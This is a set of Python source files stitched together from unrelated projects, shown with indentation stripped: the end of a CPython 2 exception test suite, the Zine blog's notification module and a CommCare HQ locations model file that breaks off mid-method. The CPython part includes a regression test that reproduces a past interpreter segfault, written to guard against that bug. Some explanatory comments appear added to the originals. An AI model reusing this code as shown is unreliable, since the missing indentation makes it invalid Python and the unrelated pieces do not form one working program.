# See issue 16445: use of Py_XDECREF instead of Py_CLEAR in
# BaseException_set_message gave a possible way to segfault the
# interpreter.
class Nasty(str):
def __del__(message):
del e.message
e = ValueError(Nasty("msg"))
e.args = ()
del e.message
# Helper class used by TestSameStrAndUnicodeMsg
class ExcWithOverriddenStr(Exception):
"""Subclass of Exception that accepts a keyword 'msg' arg that is
returned by __str__. 'msg' won't be included in self.args"""
def __init__(self, *args, **kwargs):
self.msg = kwargs.pop('msg') # msg should always be present
super(ExcWithOverriddenStr, self).__init__(*args, **kwargs)
def __str__(self):
return self.msg
class TestSameStrAndUnicodeMsg(unittest.TestCase):
"""unicode(err) should return the same message of str(err). See #6108"""
def check_same_msg(self, exc, msg):
"""Helper function that checks if str(exc) == unicode(exc) == msg"""
self.assertEqual(str(exc), msg)
self.assertEqual(str(exc), unicode(exc))
def test_builtin_exceptions(self):
"""Check same msg for built-in exceptions"""
# These exceptions implement a __str__ method that uses the args
# to create a better error message. unicode(e) should return the same
# message.
exceptions = [
SyntaxError('invalid syntax', ('<string>', 1, 3, '2+*3')),
IOError(2, 'No such file or directory'),
KeyError('both should have the same quotes'),
UnicodeDecodeError('ascii', '\xc3\xa0', 0, 1,
'ordinal not in range(128)'),
UnicodeEncodeError('ascii', u'\u1234', 0, 1,
'ordinal not in range(128)')
]
for exception in exceptions:
self.assertEqual(str(exception), unicode(exception))
def test_0_args(self):
"""Check same msg for Exception with 0 args"""
# str() and unicode() on an Exception with no args should return an
# empty string
self.check_same_msg(Exception(), '')
def test_0_args_with_overridden___str__(self):
"""Check same msg for exceptions with 0 args and overridden __str__"""
# str() and unicode() on an exception with overridden __str__ that
# returns an ascii-only string should return the same string
for msg in ('foo', u'foo'):
self.check_same_msg(ExcWithOverriddenStr(msg=msg), msg)
# if __str__ returns a non-ascii unicode string str() should fail
# but unicode() should return the unicode string
e = ExcWithOverriddenStr(msg=u'f\xf6\xf6') # no args
self.assertRaises(UnicodeEncodeError, str, e)
self.assertEqual(unicode(e), u'f\xf6\xf6')
def test_1_arg(self):
"""Check same msg for Exceptions with 1 arg"""
for arg in ('foo', u'foo'):
self.check_same_msg(Exception(arg), arg)
# if __str__ is not overridden and self.args[0] is a non-ascii unicode
# string, str() should try to return str(self.args[0]) and fail.
# unicode() should return unicode(self.args[0]) and succeed.
e = Exception(u'f\xf6\xf6')
self.assertRaises(UnicodeEncodeError, str, e)
self.assertEqual(unicode(e), u'f\xf6\xf6')
def test_1_arg_with_overridden___str__(self):
"""Check same msg for exceptions with overridden __str__ and 1 arg"""
# when __str__ is overridden and __unicode__ is not implemented
# unicode(e) returns the same as unicode(e.__str__()).
for msg in ('foo', u'foo'):
self.check_same_msg(ExcWithOverriddenStr('arg', msg=msg), msg)
# if __str__ returns a non-ascii unicode string, str() should fail
# but unicode() should succeed.
e = ExcWithOverriddenStr('arg', msg=u'f\xf6\xf6') # 1 arg
self.assertRaises(UnicodeEncodeError, str, e)
self.assertEqual(unicode(e), u'f\xf6\xf6')
def test_many_args(self):
"""Check same msg for Exceptions with many args"""
argslist = [
(3, 'foo'),
(1, u'foo', 'bar'),
(4, u'f\xf6\xf6', u'bar', 'baz')
]
# both str() and unicode() should return a repr() of the args
for args in argslist:
self.check_same_msg(Exception(*args), repr(args))
def test_many_args_with_overridden___str__(self):
"""Check same msg for exceptions with overridden __str__ and many args"""
# if __str__ returns an ascii string / ascii unicode string
# both str() and unicode() should succeed
for msg in ('foo', u'foo'):
e = ExcWithOverriddenStr('arg1', u'arg2', u'f\xf6\xf6', msg=msg)
self.check_same_msg(e, msg)
# if __str__ returns a non-ascii unicode string, str() should fail
# but unicode() should succeed
e = ExcWithOverriddenStr('arg1', u'f\xf6\xf6', u'arg3', # 3 args
msg=u'f\xf6\xf6')
self.assertRaises(UnicodeEncodeError, str, e)
self.assertEqual(unicode(e), u'f\xf6\xf6')
@cpython_only
def test_exception_with_doc(self):
import _testcapi
doc2 = "This is a test docstring."
doc4 = "This is another test docstring."
self.assertRaises(SystemError, _testcapi.make_exception_with_doc,
"error1")
# test basic usage of PyErr_NewException
error1 = _testcapi.make_exception_with_doc("_testcapi.error1")
self.assertIs(type(error1), type)
self.assertTrue(issubclass(error1, Exception))
self.assertIsNone(error1.__doc__)
# test with given docstring
error2 = _testcapi.make_exception_with_doc("_testcapi.error2", doc2)
self.assertEqual(error2.__doc__, doc2)
# test with explicit base (without docstring)
error3 = _testcapi.make_exception_with_doc("_testcapi.error3",
base=error2)
self.assertTrue(issubclass(error3, error2))
# test with explicit base tuple
class C(object):
pass
error4 = _testcapi.make_exception_with_doc("_testcapi.error4", doc4,
(error3, C))
self.assertTrue(issubclass(error4, error3))
self.assertTrue(issubclass(error4, C))
self.assertEqual(error4.__doc__, doc4)
# test with explicit dictionary
error5 = _testcapi.make_exception_with_doc("_testcapi.error5", "",
error4, {'a': 1})
self.assertTrue(issubclass(error5, error4))
self.assertEqual(error5.a, 1)
self.assertEqual(error5.__doc__, "")
def test_main():
run_unittest(ExceptionTests, TestSameStrAndUnicodeMsg)
if __name__ == '__main__':
test_main()
|
|
# -*- coding: utf-8 -*-
"""
zine.notifications
~~~~~~~~~~~~~~~~~~
This module implements an extensible notification system. Plugins can
    provide different kinds of notification systems (like email, jabber, etc.).
Each user can subscribe to different kinds of events. The general design
is inspired by Growl.
:copyright: (c) 2010 by the Zine Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from datetime import datetime
from urlparse import urlsplit
from werkzeug import url_unquote
from zine.models import NotificationSubscription
from zine.application import get_application, get_request, render_template
from zine.privileges import BLOG_ADMIN, ENTER_ACCOUNT_PANEL, MODERATE_COMMENTS,\
MODERATE_OWN_PAGES, MODERATE_OWN_ENTRIES
from zine.utils.zeml import parse_zeml
from zine.utils.mail import send_email
from zine.i18n import lazy_gettext
__all__ = ['DEFAULT_NOTIFICATION_TYPES', 'NotificationType']
DEFAULT_NOTIFICATION_TYPES = {}
def send_notification(type, message, user=Ellipsis):
"""Convenience function. Get the application object and deliver the
    notification to its NotificationManager.
The message must be a valid ZEML formatted message. The following
top-level elements are available for marking up the message:
title
The title of the notification. Some systems may only transmit this
part of the message.
summary
An optional quick summary. If the text is short enough it can be
omitted and the system will try to transmit the longtext in that
case. The upper limit for the summary should be around 100 chars.
details
If given this may either contain a paragraph with textual information
or an ordered or unordered list of text or links. The general markup
rules apply.
longtext
The full text of this notification. May contain some formattings.
actions
If given this may contain an unordered list of action links. These
links may be transmitted together with the notification.
    Additionally, if there is a page associated with the notification, there
    should be a link element with a "selflink" class somewhere.  It can be
    embedded in the longtext or actions (or in any other element).
Example markup::
<title>New comment on "Foo bar baz"</title>
<summary>Mr. Miracle wrote a new comment: "This is awesome."</summary>
<details>
<ul>
<li><a href="http://miracle.invalid/">Mr. Miracle</a>
<li><a href="mailto:[email protected]">E-Mail</a>
</ul>
</details>
<longtext>
<p>This is awesome. Keep it up!
<p>Love your work
</longtext>
<actions>
<ul>
<li><a href="http://.../link" class="selflink">all comments</a>
<li><a href="http://.../?action=delete">delete it</a>
<li><a href="http://.../?action=approve">approve it</a>
</ul>
</actions>
Example plaintext rendering (e-mail)::
Subject: New comment on "Foo bar baz"
Mr. Miracle http://miracle.invalid/
E-Mail [email protected]
> This is awesome. Keep it up!
> Love your work.
Actions:
- delete it http://.../?action=delete
- approve it http://.../?action=approve
Example IM notification rendering (jabber)::
        New comment on "Foo bar baz." Mr. Miracle wrote a new comment:
"This is awesome". http://.../link
"""
get_application().notification_manager.send(
Notification(type, message, user)
)
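# Illustrative usage sketch (not part of the original module).  The variables
# ``entry_title`` and ``comment_author`` below are hypothetical; the call only
# demonstrates the ZEML markup described in the docstring above, using the
# NEW_COMMENT type that is registered at the bottom of this module:
#
#     send_notification(NEW_COMMENT, u'''
#         <title>New comment on "%s"</title>
#         <summary>%s wrote a new comment.</summary>
#     ''' % (entry_title, comment_author))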
def send_notification_template(type, template_name, user=Ellipsis, **context):
"""Like `send_notification` but renders a template instead."""
notification = render_template(template_name, **context)
send_notification(type, notification, user)
class NotificationType(object):
"""There are different kinds of notifications. E.g. you want to
send a special type of notification after a comment is saved.
"""
def __init__(self, name, description, privileges):
self.name = name
self.description = description
self.privileges = privileges
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, self.name)
class Notification(object):
"""A notification that can be sent to a user. It contains a message.
The message is a zeml construct.
"""
def __init__(self, id, message, user=Ellipsis):
self.message = parse_zeml(message, 'system')
self.id = id
self.sent_date = datetime.utcnow()
if user is Ellipsis:
self.user = get_request().user
else:
self.user = user
@property
def self_link(self):
link = self.message.query('a[class~=selflink]').first
if link is not None:
return link.attributes.get('href')
title = property(lambda x: x.message.query('/title').first)
details = property(lambda x: x.message.query('/details').first)
actions = property(lambda x: x.message.query('/actions').first)
summary = property(lambda x: x.message.query('/summary').first)
longtext = property(lambda x: x.message.query('/longtext').first)
class NotificationSystem(object):
"""Use this as a base class for specific notification systems such as
`JabberNotificationSystem` or `EmailNotificationSystem`.
    The class must implement a method `send` that receives a user object
    and a notification object as parameters and then sends the message via
    the specific system.  The plugin itself is responsible for extracting
    the information necessary to send the message (such as the email
    address) from the user object.
"""
def __init__(self, app):
self.app = app
    #: subclasses have to override these as class attributes.
name = None
key = None
def send(self, user, notification):
raise NotImplementedError()
class EMailNotificationSystem(NotificationSystem):
"""Sends notifications to user via E-Mail."""
key = 'email'
name = lazy_gettext(u'E-Mail')
def send(self, user, notification):
title = u'[%s] %s' % (
self.app.cfg['blog_title'],
notification.title.to_text()
)
text = self.mail_from_notification(notification)
send_email(title, text, [user.email])
def unquote_link(self, link):
"""Unquotes some kinds of links. For example mailto:foo links are
stripped and properly unquoted because the mails we write are in
plain text and nobody is interested in URLs there.
"""
scheme, netloc, path = urlsplit(link)[:3]
if scheme == 'mailto':
return url_unquote(path)
return link
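    # Illustrative sketch (not in the original source): because the mails are
    # plain text, a mailto link collapses to the bare address while other URLs
    # pass through unchanged, e.g.
    #
    #     self.unquote_link('mailto:foo%40example.com')   # -> u'[email protected]'
    #     self.unquote_link('http://example.com/a%20b')   # -> 'http://example.com/a%20b'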
def collect_list_details(self, container):
"""Returns the information collected from a single detail list item."""
for item in container.children:
if len(item.children) == 1 and item.children[0].name == 'a':
link = item.children[0]
href = link.attributes.get('href')
yield dict(text=link.to_text(simple=True),
link=self.unquote_link(href), is_textual=False)
else:
yield dict(text=item.to_text(multiline=False),
link=None, is_textual=True)
def find_details(self, container):
# no container given, nothing can be found
if container is None or not container.children:
return []
result = []
for child in container.children:
if child.name in ('ul', 'ol'):
result.extend(self.collect_list_details(child))
elif child.name == 'p':
                result.append(dict(text=child.to_text(),
                                   link=None, is_textual=True))
return result
def find_actions(self, container):
if not container:
return []
ul = container.query('/ul').first
if not ul:
return []
return list(self.collect_list_details(ul))
def mail_from_notification(self, message):
title = message.title.to_text()
details = self.find_details(message.details)
longtext = message.longtext.to_text(collect_urls=True,
initial_indent=2)
actions = self.find_actions(message.actions)
return render_template('notifications/email.txt', title=title,
details=details, longtext=longtext,
actions=actions)
class NotificationManager(object):
"""The NotificationManager is informed about new notifications by the
send_notification function. It then decides to which notification
plugins the notification is handed over by looking up a database table
in the form:
user_id | notification_system | notification id
---------+---------------------+--------------------------
1 | jabber | NEW_COMMENT
1 | email | ZINE_UPGRADE_AVAILABLE
1 | sms | SERVER_EXPLODED
The NotificationManager also assures that only users interested in
a particular type of notifications receive a message.
"""
def __init__(self):
self.systems = {}
self.notification_types = DEFAULT_NOTIFICATION_TYPES.copy()
def send(self, notification):
        # given the type of the notification, check which users want that
        # notification and via which system, then call the corresponding
        # notification system to finally deliver the message
subscriptions = NotificationSubscription.query.filter_by(
notification_id=notification.id.name
)
if notification.user:
subscriptions = subscriptions.filter(
NotificationSubscription.user!=notification.user
)
for subscription in subscriptions.all():
system = self.systems.get(subscription.notification_system)
if system is not None:
system.send(subscription.user, notification)
def types(self, user=None):
if not user:
user = get_request().user
for notification in self.notification_types.itervalues():
if user.has_privilege(notification.privileges):
yield notification
def add_notification_type(self, notification):
        self.notification_types[notification.name] = notification
def _register(name, description, privileges=ENTER_ACCOUNT_PANEL):
"""Register a new builtin type of notifications."""
nottype = NotificationType(name, description, privileges)
DEFAULT_NOTIFICATION_TYPES[name] = nottype
globals()[name] = nottype
__all__.append(name)
_register('NEW_COMMENT',
lazy_gettext(u'When a new comment is received.'))
_register('COMMENT_REQUIRES_MODERATION',
lazy_gettext(u'When a comment requires moderation.'),
(MODERATE_OWN_PAGES | MODERATE_OWN_ENTRIES | MODERATE_COMMENTS))
_register('SECURITY_ALERT',
          lazy_gettext(u'When Zine finds an urgent security alert.'),
BLOG_ADMIN)
_register('ZINE_ERROR', lazy_gettext(u'When Zine throws errors.'), BLOG_ADMIN)
DEFAULT_NOTIFICATION_SYSTEMS = [EMailNotificationSystem]
del _register
|
|
import warnings
from functools import partial
from bulk_update.helper import bulk_update as bulk_update_helper
from couchdbkit import ResourceNotFound
from dimagi.ext.couchdbkit import *
import itertools
from corehq.apps.cachehq.mixins import CachedCouchDocumentMixin
from dimagi.utils.couch.database import iter_docs
from dimagi.utils.couch.migration import SyncSQLToCouchMixin, SyncCouchToSQLMixin
from dimagi.utils.decorators.memoized import memoized
from datetime import datetime
from django.db import models, transaction
import jsonfield
from casexml.apps.case.cleanup import close_case
from corehq.form_processor.interfaces.supply import SupplyInterface
from corehq.form_processor.exceptions import CaseNotFound
from corehq.apps.commtrack.const import COMMTRACK_USERNAME
from corehq.apps.domain.models import Domain
from corehq.apps.products.models import SQLProduct
from corehq.toggles import LOCATION_TYPE_STOCK_RATES
from corehq.util.soft_assert import soft_assert
from mptt.models import MPTTModel, TreeForeignKey, TreeManager
LOCATION_REPORTING_PREFIX = 'locationreportinggroup-'
def notify_of_deprecation(msg):
_assert = soft_assert(notify_admins=True, fail_if_debug=True)
message = "Deprecated Locations feature used: {}".format(msg)
_assert(False, message)
class LocationTypeManager(models.Manager):
def full_hierarchy(self, domain):
"""
Returns a graph of the form
{
'<loc_type_id>: (
loc_type,
{'<child_loc_type_id>': (child_loc_type, [...])}
)
}
"""
hierarchy = {}
def insert_loc_type(loc_type):
"""
Get parent location's hierarchy, insert loc_type into it, and return
hierarchy below loc_type
"""
if not loc_type.parent_type:
lt_hierarchy = hierarchy
else:
lt_hierarchy = insert_loc_type(loc_type.parent_type)
if loc_type.id not in lt_hierarchy:
lt_hierarchy[loc_type.id] = (loc_type, {})
return lt_hierarchy[loc_type.id][1]
for loc_type in self.filter(domain=domain).all():
insert_loc_type(loc_type)
return hierarchy
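    # Illustrative sketch (not part of the original manager): for a
    # hypothetical domain with a "state" type that is the parent of a
    # "county" type, full_hierarchy would return something shaped like
    #
    #     {state.id: (state, {county.id: (county, {})})}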
def by_domain(self, domain):
"""
Sorts location types by hierarchy
"""
ordered_loc_types = []
def step_through_graph(hierarchy):
for _, (loc_type, children) in hierarchy.items():
ordered_loc_types.append(loc_type)
step_through_graph(children)
step_through_graph(self.full_hierarchy(domain))
return ordered_loc_types
StockLevelField = partial(models.DecimalField, max_digits=10, decimal_places=1)
@memoized
def stock_level_config_for_domain(domain, commtrack_enabled):
from corehq.apps.commtrack.models import CommtrackConfig
ct_config = CommtrackConfig.for_domain(domain)
if (
(ct_config is None) or
(not commtrack_enabled) or
LOCATION_TYPE_STOCK_RATES.enabled(domain)
):
return None
else:
return ct_config.stock_levels_config
class LocationType(models.Model):
domain = models.CharField(max_length=255, db_index=True)
name = models.CharField(max_length=255)
code = models.SlugField(db_index=False, null=True)
parent_type = models.ForeignKey('self', null=True, on_delete=models.CASCADE)
administrative = models.BooleanField(default=False)
shares_cases = models.BooleanField(default=False)
view_descendants = models.BooleanField(default=False)
_expand_from = models.ForeignKey(
'self',
null=True,
related_name='+',
db_column='expand_from',
on_delete=models.CASCADE,
) # levels below this location type that we start expanding from
_expand_from_root = models.BooleanField(default=False, db_column='expand_from_root')
expand_to = models.ForeignKey('self', null=True, related_name='+', on_delete=models.CASCADE) # levels above this type that are synced
include_without_expanding = models.ForeignKey(
'self',
null=True,
related_name='+',
on_delete=models.SET_NULL,
    )  # include all levels of this type and their ancestors
last_modified = models.DateTimeField(auto_now=True)
emergency_level = StockLevelField(default=0.5)
understock_threshold = StockLevelField(default=1.5)
overstock_threshold = StockLevelField(default=3.0)
objects = LocationTypeManager()
class Meta:
app_label = 'locations'
unique_together = (
('domain', 'code'),
('domain', 'name'),
)
def __init__(self, *args, **kwargs):
super(LocationType, self).__init__(*args, **kwargs)
self._administrative_old = self.administrative
@property
def expand_from(self):
return self._expand_from
@expand_from.setter
def expand_from(self, value):
if self._expand_from_root is True:
self._expand_from_root = False
self._expand_from = value
@property
def expand_from_root(self):
return self._expand_from_root
@expand_from_root.setter
def expand_from_root(self, value):
if self._expand_from_root is False and value is True:
self._expand_from = None
self._expand_from_root = value
@property
@memoized
def commtrack_enabled(self):
return Domain.get_by_name(self.domain).commtrack_enabled
def _populate_stock_levels(self, config):
self.emergency_level = config.emergency_level
self.understock_threshold = config.understock_threshold
self.overstock_threshold = config.overstock_threshold
def save(self, *args, **kwargs):
if not self.code:
from corehq.apps.commtrack.util import unicode_slug
self.code = unicode_slug(self.name)
if not self.commtrack_enabled:
self.administrative = True
config = stock_level_config_for_domain(self.domain, self.commtrack_enabled)
if config:
self._populate_stock_levels(config)
is_not_first_save = self.pk is not None
saved = super(LocationType, self).save(*args, **kwargs)
if is_not_first_save:
self.sync_administrative_status()
return saved
def sync_administrative_status(self, sync_supply_points=True):
from .tasks import sync_administrative_status
if self._administrative_old != self.administrative:
sync_administrative_status.delay(self, sync_supply_points=sync_supply_points)
self._administrative_old = self.administrative
def __unicode__(self):
return self.name
def __repr__(self):
return u"LocationType(domain='{}', name='{}', administrative={})".format(
self.domain,
self.name,
self.administrative,
).encode('utf-8')
@property
@memoized
def can_have_children(self):
return LocationType.objects.filter(parent_type=self).exists()
@classmethod
def _pre_bulk_save(cls, objects):
if not objects:
return
commtrack_enabled = objects[0].commtrack_enabled
if not commtrack_enabled:
for o in objects:
o.administrative = True
domain = objects[0].domain
stock_config = stock_level_config_for_domain(domain, commtrack_enabled)
if stock_config:
for o in objects:
o._populate_stock_levels(stock_config)
@classmethod
def bulk_create(cls, objects):
# 'objects' is a list of new LocationType objects to be created
if not objects:
return []
cls._pre_bulk_save(objects)
domain = objects[0].domain
names = [o.name for o in objects]
cls.objects.bulk_create(objects)
# we can return 'objects' directly without the below extra DB call after django 1.10,
# which autosets 'id' attribute of all objects that are bulk created
return list(cls.objects.filter(domain=domain, name__in=names))
@classmethod
def bulk_update(cls, objects):
# 'objects' is a list of existing LocationType objects to be updated
# Note: this is tightly coupled with .bulk_management.NewLocationImporter.bulk_commit()
# so it can't be used on its own
cls._pre_bulk_save(objects)
now = datetime.utcnow()
for o in objects:
o.last_modified = now
# the caller should call 'sync_administrative_status' for individual objects
bulk_update_helper(objects)
@classmethod
def bulk_delete(cls, objects):
# Given a list of existing SQL objects, bulk delete them
if not objects:
return
ids = [o.id for o in objects]
cls.objects.filter(id__in=ids).delete()
class LocationQueriesMixin(object):
def location_ids(self):
return self.values_list('location_id', flat=True)
def couch_locations(self, wrapped=True):
"""
Returns the couch locations corresponding to this queryset.
"""
warnings.warn(
"Converting SQLLocations to couch locations. This should be "
"used for backwards compatability only - not new features.",
DeprecationWarning,
)
ids = self.location_ids()
locations = iter_docs(Location.get_db(), ids)
if wrapped:
return itertools.imap(Location.wrap, locations)
return locations
def accessible_to_user(self, domain, user):
if user.has_permission(domain, 'access_all_locations'):
return self.all()
users_location = user.get_sql_location(domain)
if not users_location:
return self.none() # No locations are accessible to this user
return self.all() & users_location.get_descendants(include_self=True)
class LocationQuerySet(LocationQueriesMixin, models.query.QuerySet):
pass
class LocationManager(LocationQueriesMixin, TreeManager):
def get_or_None(self, **kwargs):
try:
return self.get(**kwargs)
except SQLLocation.DoesNotExist:
return None
def _get_base_queryset(self):
return LocationQuerySet(self.model, using=self._db)
def get_queryset(self):
return (self._get_base_queryset()
.order_by(self.tree_id_attr, self.left_attr)) # mptt default
def get_from_user_input(self, domain, user_input):
"""
        First check by site-code; if that fails, fall back to name.
Note that name lookup may raise MultipleObjectsReturned.
"""
try:
return self.get(domain=domain, site_code=user_input)
except self.model.DoesNotExist:
return self.get(domain=domain, name__iexact=user_input)
def filter_by_user_input(self, domain, user_input):
"""
Accepts partial matches, matches against name and site_code.
"""
return (self.filter(domain=domain)
.filter(models.Q(name__icontains=user_input) |
models.Q(site_code__icontains=user_input)))
def filter_path_by_user_input(self, domain, user_input):
"""
Returns a queryset including all locations matching the user input
and their children. This means "Middlesex" will match:
Massachusetts/Middlesex
Massachusetts/Middlesex/Boston
Massachusetts/Middlesex/Cambridge
It matches by name or site-code
"""
direct_matches = self.filter_by_user_input(domain, user_input)
return self.get_queryset_descendants(direct_matches, include_self=True)
class OnlyUnarchivedLocationManager(LocationManager):
def get_queryset(self):
return (super(OnlyUnarchivedLocationManager, self).get_queryset()
.filter(is_archived=False))
class SQLLocation(SyncSQLToCouchMixin, MPTTModel):
domain = models.CharField(max_length=255, db_index=True)
name = models.CharField(max_length=100, null=True)
location_id = models.CharField(max_length=100, db_index=True, unique=True)
_migration_couch_id_name = "location_id" # Used for SyncSQLToCouchMixin
location_type = models.ForeignKey(LocationType, on_delete=models.CASCADE)
site_code = models.CharField(max_length=255)
external_id = models.CharField(max_length=255, null=True)
metadata = jsonfield.JSONField(default=dict)
created_at = models.DateTimeField(auto_now_add=True)
last_modified = models.DateTimeField(auto_now=True)
is_archived = models.BooleanField(default=False)
latitude = models.DecimalField(max_digits=20, decimal_places=10, null=True)
longitude = models.DecimalField(max_digits=20, decimal_places=10, null=True)
parent = TreeForeignKey('self', null=True, blank=True, related_name='children', on_delete=models.CASCADE)
    # Use the getter and setter below to access this value, since
    # stocks_all_products can cause an empty list to be stored for a
    # location that actually has all products available.
_products = models.ManyToManyField(SQLProduct)
stocks_all_products = models.BooleanField(default=True)
supply_point_id = models.CharField(max_length=255, db_index=True, unique=True, null=True)
objects = _tree_manager = LocationManager()
# This should really be the default location manager
active_objects = OnlyUnarchivedLocationManager()
@classmethod
def _migration_get_fields(cls):
return ["domain", "name", "lineage", "site_code", "external_id",
"metadata", "is_archived"]
@classmethod
def _migration_get_couch_model_class(cls):
return Location
def _migration_do_sync(self):
couch_obj = self._migration_get_or_create_couch_object()
couch_obj._sql_location_type = self.location_type
couch_obj.latitude = float(self.latitude) if self.latitude else None
couch_obj.longitude = float(self.longitude) if self.longitude else None
self._migration_sync_to_couch(couch_obj)
@transaction.atomic()
def save(self, *args, **kwargs):
from corehq.apps.commtrack.models import sync_supply_point
self.supply_point_id = sync_supply_point(self)
sync_to_couch = kwargs.pop('sync_to_couch', True)
kwargs['sync_to_couch'] = False # call it here
super(SQLLocation, self).save(*args, **kwargs)
if sync_to_couch:
self._migration_do_sync()
@property
def lineage(self):
return list(self.get_ancestors(ascending=True).location_ids())
    # A few aliases for location_id to be compatible with couch locs
_id = property(lambda self: self.location_id)
get_id = property(lambda self: self.location_id)
group_id = property(lambda self: self.location_id)
@property
def products(self):
"""
If there are no products specified for this location, assume all
products for the domain are relevant.
"""
if self.stocks_all_products:
return SQLProduct.by_domain(self.domain)
else:
return self._products.all()
@products.setter
def products(self, value):
# this will set stocks_all_products to true if the user
# has added all products in the domain to this location
self.stocks_all_products = (set(value) ==
set(SQLProduct.by_domain(self.domain)))
self._products = value
def _close_case_and_remove_users(self):
"""
Closes linked supply point cases for a location and unassigns the users
assigned to that location.
Used by both archive and delete methods
"""
sp = self.linked_supply_point()
# sanity check that the supply point exists and is still open.
# this is important because if you archive a child, then try
# to archive the parent, we don't want to try to close again
if sp and not sp.closed:
close_case(sp.case_id, self.domain, COMMTRACK_USERNAME)
_unassign_users_from_location(self.domain, self.location_id)
def _archive_single_location(self):
"""
Archive a single location, caller is expected to handle
archiving children as well.
This is just used to prevent having to do recursive
couch queries in `archive()`.
"""
self.is_archived = True
self.save()
self._close_case_and_remove_users()
def archive(self):
"""
Mark a location and its descendants as archived.
This will cause it (and its data) to not show up in default Couch and
SQL views. This also unassigns users assigned to the location.
"""
for loc in self.get_descendants(include_self=True):
loc._archive_single_location()
def _unarchive_single_location(self):
"""
Unarchive a single location, caller is expected to handle
unarchiving children as well.
This is just used to prevent having to do recursive
couch queries in `unarchive()`.
"""
self.is_archived = False
self.save()
# reopen supply point case if needed
sp = self.linked_supply_point()
# sanity check that the supply point exists and is not open.
# this is important because if you unarchive a child, then try
# to unarchive the parent, we don't want to try to open again
if sp and sp.closed:
for action in sp.actions:
if action.action_type == 'close':
action.xform.archive(user_id=COMMTRACK_USERNAME)
break
def unarchive(self):
"""
Unarchive a location and reopen supply point case if it
exists.
"""
for loc in self.get_descendants(include_self=True):
loc._unarchive_single_location()
def full_delete(self):
"""
Delete a location and its dependants.
This also unassigns users assigned to the location.
"""
to_delete = self.get_descendants(include_self=True).couch_locations()
# if there are errors deleting couch locations, roll back sql delete
with transaction.atomic():
self.sql_full_delete()
Location.get_db().bulk_delete(to_delete)
def sql_full_delete(self):
"""
SQL ONLY FULL DELETE
        Delete this location and its descendants.
"""
ids_to_delete = self.get_descendants(include_self=True).location_ids()
for loc_id in ids_to_delete:
loc = SQLLocation.objects.prefetch_related(
'location_type').get(location_id=loc_id)
loc._sql_close_case_and_remove_users()
self.get_descendants(include_self=True).delete()
def _sql_close_case_and_remove_users(self):
"""
SQL ONLY VERSION
Closes linked supply point cases for a location and unassigns the users
assigned to that location.
Used by both archive and delete methods
"""
sp = self.linked_supply_point()
# sanity check that the supply point exists and is still open.
# this is important because if you archive a child, then try
# to archive the parent, we don't want to try to close again
if sp and not sp.closed:
close_case(sp.case_id, self.domain, COMMTRACK_USERNAME)
_unassign_users_from_location(self.domain, self.location_id)
class Meta:
app_label = 'locations'
unique_together = ('domain', 'site_code',)
def __unicode__(self):
return u"{} ({})".format(self.name, self.domain)
def __repr__(self):
return u"SQLLocation(domain='{}', name='{}', location_type='{}')".format(
self.domain,
self.name,
self.location_type.name,
).encode('utf-8')
@property
def display_name(self):
return u"{} [{}]".format(self.name, self.location_type.name)
def archived_descendants(self):
"""
Returns a list of archived descendants for this location.
"""
return self.get_descendants().filter(is_archived=True)
def child_locations(self, include_archive_ancestors=False):
"""
Returns a list of this location's children.
"""
children = self.get_children()
return filter_for_archived(children, include_archive_ancestors)
@classmethod
def root_locations(cls, domain, include_archive_ancestors=False):
roots = cls.objects.root_nodes().filter(domain=domain)
return filter_for_archived(roots, include_archive_ancestors)
def get_path_display(self):
return '/'.join(self.get_ancestors(include_self=True)
.values_list('name', flat=True))
def _make_group_object(self, user_id, case_sharing):
from corehq.apps.groups.models import UnsavableGroup
g = UnsavableGroup()
g.domain = self.domain
g.users = [user_id] if user_id else []
g.last_modified = datetime.utcnow()
if case_sharing:
g.name = self.get_path_display() + '-Cases'
g._id = self.location_id
g.case_sharing = True
g.reporting = False
else:
# reporting groups
g.name = self.get_path_display()
g._id = LOCATION_REPORTING_PREFIX + self.location_id
g.case_sharing = False
g.reporting = True
g.metadata = {
'commcare_location_type': self.location_type.name,
'commcare_location_name': self.name,
}
for key, val in self.metadata.items():
g.metadata['commcare_location_' + key] = val
return g
def get_case_sharing_groups(self, for_user_id=None):
if self.location_type.shares_cases:
yield self.case_sharing_group_object(for_user_id)
if self.location_type.view_descendants:
for sql_loc in self.get_descendants().filter(location_type__shares_cases=True, is_archived=False):
yield sql_loc.case_sharing_group_object(for_user_id)
def case_sharing_group_object(self, user_id=None):
"""
Returns a fake group object that cannot be saved.
This is used for giving users access via case
sharing groups, without having a real group
for every location that we have to manage/hide.
"""
return self._make_group_object(
user_id,
case_sharing=True,
)
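    # Illustrative sketch (not part of the original model): callers usually
    # collect these unsavable groups when working out a user's case-sharing
    # scope, e.g.
    #
    #     groups = list(location.get_case_sharing_groups(for_user_id=user_id))
    #
    # where ``location`` is an SQLLocation and ``user_id`` is hypothetical.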
@property
@memoized
def couch_location(self):
return Location.get(self.location_id)
def is_direct_ancestor_of(self, location):
return (location.get_ancestors(include_self=True)
.filter(pk=self.pk).exists())
@classmethod
def by_domain(cls, domain):
return cls.objects.filter(domain=domain)
@property
def path(self):
_path = list(reversed(self.lineage))
_path.append(self._id)
return _path
@classmethod
def by_location_id(cls, location_id):
try:
return cls.objects.get(location_id=location_id)
except cls.DoesNotExist:
return None
def linked_supply_point(self):
if not self.supply_point_id:
return None
try:
return SupplyInterface(self.domain).get_supply_point(self.supply_point_id)
except CaseNotFound:
return None
@property
def parent_location_id(self):
return self.parent.location_id if self.parent else None
@property
def location_type_object(self):
return self.location_type
@property
def location_type_name(self):
return self.location_type.name
@property
def sql_location(self):
        # For backwards compatibility
notify_of_deprecation("'sql_location' was just called on a sql_location. That's kinda silly.")
return self
def filter_for_archived(locations, include_archive_ancestors):
"""
Perform filtering on a location queryset.
include_archive_ancestors toggles between selecting only active
children and selecting any child that is archived or has
archived descendants.
"""
if include_archive_ancestors:
return [
item for item in locations
if item.is_archived or item.archived_descendants()
]
else:
return locations.filter(is_archived=False)
class Location(SyncCouchToSQLMixin, CachedCouchDocumentMixin, Document):
domain = StringProperty()
name = StringProperty()
site_code = StringProperty() # should be unique, not yet enforced
# unique id from some external data source
external_id = StringProperty()
metadata = DictProperty()
last_modified = DateTimeProperty()
is_archived = BooleanProperty(default=False)
latitude = FloatProperty()
longitude = FloatProperty()
# a list of doc ids, referring to the parent location, then the
# grand-parent, and so on up to the root location in the hierarchy
lineage = StringListProperty()
@classmethod
def wrap(cls, data):
last_modified = data.get('last_modified')
data.pop('location_type', None) # Only store location type in SQL
# if it's missing a Z because of the Aug. 2014 migration
